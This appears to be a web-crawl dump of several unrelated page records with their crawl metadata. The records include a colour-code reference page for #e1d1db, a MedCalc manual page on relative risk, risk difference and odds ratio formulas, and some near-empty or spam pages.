"https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, 
"https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5817505,"math_prob":0.81506366,"size":14707,"snap":"2020-45-2020-50","text_gpt3_token_len":4983,"char_repetition_ratio":0.17676665,"word_repetition_ratio":0.6569451,"special_character_ratio":0.3698239,"punctuation_ratio":0.27770782,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9611399,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T21:48:29Z\",\"WARC-Record-ID\":\"<urn:uuid:acf0a962-2cb2-4970-a83c-11cfafb69c9e>\",\"Content-Length\":\"120670\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fac92975-4522-4adc-9269-78740896e9a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:6f8aca17-cd2b-41f7-8fca-1a4c829f8524>\",\"WARC-IP-Address\":\"107.161.80.18\",\"WARC-Target-URI\":\"https://www.aimsciences.org/article/doi/10.3934/cpaa.2018129\",\"WARC-Payload-Digest\":\"sha1:RWAFP6OC4B34EUFX3KK5GVE5MGZWRE67\",\"WARC-Block-Digest\":\"sha1:K5WFRN6AGEEORELF24MFBSCXIHIIQK2A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141681524.75_warc_CC-MAIN-20201201200611-20201201230611-00641.warc.gz\"}"}
https://www.colorhexa.com/e1d1db
[ "# #e1d1db Color Information\n\nIn a RGB color space, hex #e1d1db is composed of 88.2% red, 82% green and 85.9% blue. Whereas in a CMYK color space, it is composed of 0% cyan, 7.1% magenta, 2.7% yellow and 11.8% black. It has a hue angle of 322.5 degrees, a saturation of 21.1% and a lightness of 85.1%. #e1d1db color hex could be obtained by blending #ffffff with #c3a3b7. Closest websafe color is: #cccccc.\n\n• R 88\n• G 82\n• B 86\nRGB color chart\n• C 0\n• M 7\n• Y 3\n• K 12\nCMYK color chart\n\n#e1d1db color description : Light grayish pink.\n\n# #e1d1db Color Conversion\n\nThe hexadecimal color #e1d1db has RGB values of R:225, G:209, B:219 and CMYK values of C:0, M:0.07, Y:0.03, K:0.12. Its decimal value is 14799323.\n\nHex triplet RGB Decimal e1d1db `#e1d1db` 225, 209, 219 `rgb(225,209,219)` 88.2, 82, 85.9 `rgb(88.2%,82%,85.9%)` 0, 7, 3, 12 322.5°, 21.1, 85.1 `hsl(322.5,21.1%,85.1%)` 322.5°, 7.1, 88.2 cccccc `#cccccc`\nCIE-LAB 85.364, 7.267, -2.943 66.636, 66.723, 76.382 0.318, 0.318, 66.723 85.364, 7.84, 337.954 85.364, 8.574, -5.777 81.684, 2.668, 1.737 11100001, 11010001, 11011011\n\n# Color Schemes with #e1d1db\n\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #d1e1d7\n``#d1e1d7` `rgb(209,225,215)``\nComplementary Color\n• #dfd1e1\n``#dfd1e1` `rgb(223,209,225)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e1d1d3\n``#e1d1d3` `rgb(225,209,211)``\nAnalogous Color\n• #d1e1df\n``#d1e1df` `rgb(209,225,223)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #d3e1d1\n``#d3e1d1` `rgb(211,225,209)``\nSplit Complementary Color\n• #d1dbe1\n``#d1dbe1` `rgb(209,219,225)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #dbe1d1\n``#dbe1d1` `rgb(219,225,209)``\n• #d7d1e1\n``#d7d1e1` `rgb(215,209,225)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #dbe1d1\n``#dbe1d1` `rgb(219,225,209)``\n• #d1e1d7\n``#d1e1d7` `rgb(209,225,215)``\n• #c3a3b7\n``#c3a3b7` `rgb(195,163,183)``\n• #cdb2c3\n``#cdb2c3` `rgb(205,178,195)``\n• #d7c2cf\n``#d7c2cf` `rgb(215,194,207)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #ebe0e7\n``#ebe0e7` `rgb(235,224,231)``\n• #f5f0f3\n``#f5f0f3` `rgb(245,240,243)``\n• #ffffff\n``#ffffff` `rgb(255,255,255)``\nMonochromatic Color\n\n# Alternatives to #e1d1db\n\nBelow, you can see some colors close to #e1d1db. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #e1d1df\n``#e1d1df` `rgb(225,209,223)``\n• #e1d1de\n``#e1d1de` `rgb(225,209,222)``\n• #e1d1dc\n``#e1d1dc` `rgb(225,209,220)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e1d1da\n``#e1d1da` `rgb(225,209,218)``\n• #e1d1d8\n``#e1d1d8` `rgb(225,209,216)``\n• #e1d1d7\n``#e1d1d7` `rgb(225,209,215)``\nSimilar Colors\n\n# #e1d1db Preview\n\nThis text has a font color of #e1d1db.\n\n``<span style=\"color:#e1d1db;\">Text here</span>``\n#e1d1db background color\n\nThis paragraph has a background color of #e1d1db.\n\n``<p style=\"background-color:#e1d1db;\">Content here</p>``\n#e1d1db border color\n\nThis element has a border color of #e1d1db.\n\n``<div style=\"border:1px solid #e1d1db;\">Content here</div>``\nCSS codes\n``.text {color:#e1d1db;}``\n``.background {background-color:#e1d1db;}``\n``.border {border:1px solid #e1d1db;}``\n\n# Shades and Tints of #e1d1db\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #010101 is the darkest color, while #f8f5f7 is the lightest one.\n\n• #010101\n``#010101` `rgb(1,1,1)``\n• #0d090c\n``#0d090c` `rgb(13,9,12)``\n• #191016\n``#191016` `rgb(25,16,22)``\n• #251820\n``#251820` `rgb(37,24,32)``\n• #31202b\n``#31202b` `rgb(49,32,43)``\n• #3d2835\n``#3d2835` `rgb(61,40,53)``\n• #492f3f\n``#492f3f` `rgb(73,47,63)``\n• #55374a\n``#55374a` `rgb(85,55,74)``\n• #603f54\n``#603f54` `rgb(96,63,84)``\n• #6c475e\n``#6c475e` `rgb(108,71,94)``\n• #784e69\n``#784e69` `rgb(120,78,105)``\n• #845673\n``#845673` `rgb(132,86,115)``\n• #905e7d\n``#905e7d` `rgb(144,94,125)``\n• #9b6687\n``#9b6687` `rgb(155,102,135)``\n• #a37291\n``#a37291` `rgb(163,114,145)``\n• #ab7e9a\n``#ab7e9a` `rgb(171,126,154)``\n• #b38aa3\n``#b38aa3` `rgb(179,138,163)``\n``#ba96ad` `rgb(186,150,173)``\n• #c2a2b6\n``#c2a2b6` `rgb(194,162,182)``\n``#caadbf` `rgb(202,173,191)``\n• #d2b9c8\n``#d2b9c8` `rgb(210,185,200)``\n• #d9c5d2\n``#d9c5d2` `rgb(217,197,210)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e9dde4\n``#e9dde4` `rgb(233,221,228)``\n• #f0e9ee\n``#f0e9ee` `rgb(240,233,238)``\n• #f8f5f7\n``#f8f5f7` `rgb(248,245,247)``\nTint Color Variation\n\n# Tones of #e1d1db\n\nA tone is produced by adding gray to any pure hue. In this case, #dbd7da is the less saturated color, while #feb4e2 is the most saturated one.\n\n• #dbd7da\n``#dbd7da` `rgb(219,215,218)``\n• #ded4da\n``#ded4da` `rgb(222,212,218)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e4cedc\n``#e4cedc` `rgb(228,206,220)``\n• #e7cbdc\n``#e7cbdc` `rgb(231,203,220)``\n• #eac8dd\n``#eac8dd` `rgb(234,200,221)``\n• #edc5de\n``#edc5de` `rgb(237,197,222)``\n• #f0c2df\n``#f0c2df` `rgb(240,194,223)``\n• #f3bfdf\n``#f3bfdf` `rgb(243,191,223)``\n• #f5bde0\n``#f5bde0` `rgb(245,189,224)``\n• #f8bae1\n``#f8bae1` `rgb(248,186,225)``\n• #fbb7e2\n``#fbb7e2` `rgb(251,183,226)``\n• #feb4e2\n``#feb4e2` `rgb(254,180,226)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #e1d1db is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.538335,"math_prob":0.63851315,"size":3715,"snap":"2021-21-2021-25","text_gpt3_token_len":1714,"char_repetition_ratio":0.12638102,"word_repetition_ratio":0.011090573,"special_character_ratio":0.52328396,"punctuation_ratio":0.23608018,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97621083,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-18T02:16:37Z\",\"WARC-Record-ID\":\"<urn:uuid:465a8ab4-cdf8-466e-a530-400d78ce22a4>\",\"Content-Length\":\"36348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:798d2cad-8389-40e7-bbd5-dcbeabac0ff9>\",\"WARC-Concurrent-To\":\"<urn:uuid:a2f20b45-33fd-49e7-a3e1-e700f93f60a8>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/e1d1db\",\"WARC-Payload-Digest\":\"sha1:J3GWXJSHYSNYSAUDWIJOFGRPNHFIWOAO\",\"WARC-Block-Digest\":\"sha1:XCNU4H6QDZY3E6V5DUNCHPIEI46VYIC4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991650.73_warc_CC-MAIN-20210518002309-20210518032309-00401.warc.gz\"}"}
https://www.medcalc.org/manual/relative-risk-odds-ratio.php
[ "MedCalc", null, "", null, "# Relative risk, Risk difference and Odds ratio\n\nWhen the data to be analyzed consist of counts in a cross-classification of two groups (or conditions) and two outcomes, the data can be represented in a fourfold table as follows:\n\nGroup 1Group 2Total\nNumber with positive outcomeaca+c\nNumber with negative outcomebdb+d\nTotala+bc+da+b+c+d\n\nSeveral statistics can be calculated such as relative risk and risk difference, relevant in prospective studies, and odds ratio, relevant in retrospective case controls studies.\n\n## How to calculate Relative Risk\n\nThe relative risk (RR), its standard error and 95% confidence interval are calculated as follows (Altman, 1991).\n\nThe relative risk or risk ratio is given by", null, "$$RR = \\frac {a/(a+b) } { c/(c+d) }$$\n\nwith the standard error of the log relative risk being", null, "$$\\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(RR\\right) \\right \\} = \\sqrt { \\frac {1}{a} + \\frac {1}{c} - \\frac {1}{a+b} - \\frac {1}{c+d} }$$\n\nand 95% confidence interval", null, "$$\\operatorname{95\\%\\text{ } CI} = \\operatorname{exp} \\Big( \\text{ } \\operatorname{ln}\\left(RR\\right) - 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(RR\\right) \\right \\} \\text{ } \\Big) \\quad \\text{ to }\\quad \\operatorname{exp} \\Big(\\text{ } \\operatorname{ln}\\left(RR\\right) + 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(RR\\right) \\right \\} \\text{ }\\Big)$$\n\n## Risk difference\n\nThe risk difference (RD) and its 95% confidence interval are calculated according to Newcombe & Altman (2000)", null, "$$RD = \\frac {a} {a+b} - \\frac {c} {c+d}$$\n\nThe recommended method for the calculation of the risk difference, which is a difference between proportions, requires the calculation of the confidence intervals of the two proportions separately. MedCalc calculates exact binomial confidence intervals for proportions (Armitage et al., 2002). 
With l1 to u1 being the 95% CI of the first proportion p1 and l2 to u2 being the 95% CI of the second proportion p2, the 95% confidence interval for the difference is given by", null, "$$\\operatorname{95\\%\\text{ } CI} = RD - \\sqrt { (p_1-l_1)^2 + (u_2-p_2)^2 } \\quad \\text{ to }\\quad RD + \\sqrt { (p_2-l_2)^2 + (u_1-p_1)^2}$$\n\nIn the context of meta-analysis, the standard error and 95% confidence interval are calculated according to Deeks & Higgins (2010), where the standard error is defined as", null, "$$\\operatorname{SE} \\left \\{ RD \\right \\} = \\sqrt { \\frac {a \\times b}{ \\left ( a+b \\right )^3} + \\frac {c\\times d}{\\left (c+d\\right )^3} }$$\n\nand 95% confidence interval", null, "$$\\operatorname{95\\%\\text{ } CI} = RD - 1.96 \\times \\operatorname{SE} \\left \\{ RD \\right \\} \\quad \\text{ to }\\quad RD + 1.96 \\times \\operatorname{SE} \\left \\{ RD \\right \\}$$\n\n## How to calculate Odds Ratio\n\nThe odds ratio (OR), its standard error and 95% confidence interval are calculated as follows (Altman, 1991).\n\nThe formula for odds ratio is:", null, "\\begin{align} OR & = \\frac {a/b} {c/d} \\\\ & = \\frac {a \\times d } { b \\times c} \\end{align}\n\nwith the standard error of the log odds ratio being", null, "$$\\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(OR\\right) \\right \\} = \\sqrt { \\frac {1}{a} + \\frac {1}{b} + \\frac {1}{c} + \\frac {1}{d} }$$\n\nand 95% confidence interval", null, "$$\\operatorname{95\\%\\text{ } CI} = \\operatorname{exp} \\Big( \\text{ } \\operatorname{ln}\\left(OR\\right) - 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(OR\\right) \\right \\} \\text{ }\\Big) \\quad \\text{ to }\\quad \\operatorname{exp} \\Big(\\text{ } \\operatorname{ln}\\left(OR\\right) + 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(OR\\right) \\right \\} \\text{ }\\Big)$$\n\n## Notes\n\nWhere zeros cause problems with computation of effects or standard errors, 0.5 is added to all cells (a, b, c, d) (Pagano & Gauvreau, 2000; Deeks & Higgins, 2010).\n\nIn meta-analysis for relative risk and odds ratio, studies where a=c=0 or b=d=0 are excluded from the analysis (Higgins & Thomas, 2021).\n\n## Statistics with Confidence: Confidence Intervals and Statistical GuidelinesAltman DG, Machin D, Bryant TN, Gardner MJ (Eds)\n\nBuy from Amazon US - CA - UK - DE - FR - ES - IT\n\nThis introduction to confidence intervals has been updated and expanded to include methods for using confidence intervals, with illustrative worked examples and extensive guidelines and checklists to help the novice. There are six new chapters on areas such as diagnostic studies and meta-analyses." ]
[ null, "https://www.medcalc.org/gif/wait20trans.gif", null, "https://www.medcalc.org/svg/hamburger_icon.svg", null, "https://www.medcalc.org/manual/formula/relativerisk.png", null, "https://www.medcalc.org/manual/formula/relativerisk_se.png", null, "https://www.medcalc.org/manual/formula/relativerisk_ci.png", null, "https://www.medcalc.org/manual/formula/riskdifference.png", null, "https://www.medcalc.org/manual/formula/riskdifference_ci2.png", null, "https://www.medcalc.org/manual/formula/riskdifference_se.png", null, "https://www.medcalc.org/manual/formula/riskdifference_ci.png", null, "https://www.medcalc.org/manual/formula/odds-ratio-formula.png", null, "https://www.medcalc.org/manual/formula/oddsratio_se.png", null, "https://www.medcalc.org/manual/formula/oddsratio_ci.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8350114,"math_prob":0.9980131,"size":3437,"snap":"2021-43-2021-49","text_gpt3_token_len":834,"char_repetition_ratio":0.14389746,"word_repetition_ratio":0.09514926,"special_character_ratio":0.24003491,"punctuation_ratio":0.12619808,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999099,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,null,null,3,null,3,null,3,null,2,null,2,null,2,null,2,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-09T01:44:27Z\",\"WARC-Record-ID\":\"<urn:uuid:03910abc-d31c-4662-907f-e3d592dd6530>\",\"Content-Length\":\"37580\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e9759bd-896a-43db-bc0d-b6d816399580>\",\"WARC-Concurrent-To\":\"<urn:uuid:f4b8497e-555a-4910-9b0e-0f469e90b11c>\",\"WARC-IP-Address\":\"104.26.2.186\",\"WARC-Target-URI\":\"https://www.medcalc.org/manual/relative-risk-odds-ratio.php\",\"WARC-Payload-Digest\":\"sha1:DMBNT5ENUHIHD6LX6OPOTK775IB6M6EA\",\"WARC-Block-Digest\":\"sha1:5CPDCNHCW5F45EZUPLGKHA6UNNSLYXHQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363641.20_warc_CC-MAIN-20211209000407-20211209030407-00627.warc.gz\"}"}
http://jfywlkj.com/fenghuangcaipiao/NStpnjLUUIcnHIEXUIkOKS4.fenghuangcaipiaopingtai
[ "```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9484685,"math_prob":0.99257743,"size":937,"snap":"2019-26-2019-30","text_gpt3_token_len":939,"char_repetition_ratio":0.075026795,"word_repetition_ratio":0.096551724,"special_character_ratio":0.2828175,"punctuation_ratio":0.24365482,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9929877,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T20:00:47Z\",\"WARC-Record-ID\":\"<urn:uuid:9e49d233-38b3-42ca-a050-757f2e2f46a6>\",\"Content-Length\":\"143463\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:24aab5fb-8f40-4210-baaf-f702dc2f02a6>\",\"WARC-Concurrent-To\":\"<urn:uuid:6d099b85-f323-4726-90eb-3bb311fa0d72>\",\"WARC-IP-Address\":\"156.234.164.5\",\"WARC-Target-URI\":\"http://jfywlkj.com/fenghuangcaipiao/NStpnjLUUIcnHIEXUIkOKS4.fenghuangcaipiaopingtai\",\"WARC-Payload-Digest\":\"sha1:NO6TDMIEEHGELH63O3A7P2NXJBEGFEC3\",\"WARC-Block-Digest\":\"sha1:JBSEI7TIXFFUMT7EFGILN5LZDFWKSZIS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998291.9_warc_CC-MAIN-20190616182800-20190616204800-00228.warc.gz\"}"}
http://desistreem.info/third-grade-measurement-worksheets/mass-worksheets-4th-grade-measurement-third-first-and-printables/
[ "Mass Worksheets 4th Grade Measurement Third First And Printables", null, "mass worksheets 4th grade measurement third first and printables.\n\n4th grade angle measurement worksheets math 3 science 2 geometry and,math worksheets grade 3 measurement 3rd for inches 4th measuring angles 2nd common core,grade 2 measurement worksheets pdf liquid volume cm geometry and,first grade nonstandard measurement worksheets 2nd non standard for the best image common core math,measurement worksheets grade 2 centimeters and data converting length 2nd non standard 4th,3rd grade science measurement worksheets measuring inches converting length measurements between metric 4th common core,2nd grade measurement worksheets word problems pdf and data,4th grade measurement word problems worksheets 2 common core second and printables unique third math,3rd grade measurement and geometry worksheets 2 free 3 pdf,grade 2 measurement worksheets cm mass 3rd and geometry 4th." ]
[ null, "http://desistreem.info/wp-content/uploads/2019/10/mass-worksheets-4th-grade-measurement-third-first-and-printables.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87197286,"math_prob":0.9477709,"size":973,"snap":"2019-43-2019-47","text_gpt3_token_len":200,"char_repetition_ratio":0.27038184,"word_repetition_ratio":0.0,"special_character_ratio":0.17882836,"punctuation_ratio":0.070063695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9892229,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T23:13:16Z\",\"WARC-Record-ID\":\"<urn:uuid:3b414331-a95b-44f6-8674-cf1bf3c11e51>\",\"Content-Length\":\"46140\",\"Content-Type\":\"application/http; 